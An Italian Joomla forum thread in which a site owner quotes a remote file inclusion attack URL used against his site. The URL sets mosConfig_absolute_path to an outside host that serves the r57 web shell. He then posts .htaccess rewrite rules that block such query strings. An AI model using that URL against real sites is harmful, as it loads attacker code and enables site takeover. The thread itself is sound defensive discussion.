Back to top

Autore Topic: mosConfig_absolute_path  (Letto 1804 volte)

Offline puitz

  • Appassionato
  • ***
  • Post: 290
  • Sesso: Maschio
  • un’immagine vale più di mille parole
    • Mostra profilo
mosConfig_absolute_path
« il: 04 Nov 2007, 20:05:48 »
ciao a tutti!
come già avevo capito da tempo il mio sito fa parte di una "bella" lista di siti da hackerare...dopo vari tentativi, sono riuscito ad entrare su un forum di questi simpaticoni e come url per lanciare script c'è questo:

http://www.miosito.it/index.php?mosConfig_absolute_path=http://casus-team.com/r57.txt?

che danni possono fare?come posso proteggermi?...soluzioni varie?
ciauzzzz
« Ultima modifica: 07 Nov 2007, 12:54:24 da puitz »

Offline puitz

  • Appassionato
  • ***
  • Post: 290
  • Sesso: Maschio
  • un’immagine vale più di mille parole
    • Mostra profilo
Re: mosConfig_absolute_path
« Risposta #1 il: 07 Nov 2007, 15:04:11 »
speravo di scambiare qualche parere con chi "mangia" joomla a colazione....cmq...a quanto pare questo tipo di attacco, remote file inclusion, è molto comune in joomla (potenzialmente ogni sito scritto in php può essere vulnerabile);
in giro c'è chi ha imputato il problema a openSEF, SEF advance, zOOm Gallery, SEF404x...e l'unico accorgimento è aggiornare all'ultima versione disponibile del componente.
per il SEF (e credo che sia il mio problema) propongono di inserire nel file .htaccess

########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the  URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script>  tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

 



Web Design Bolzano Kreatif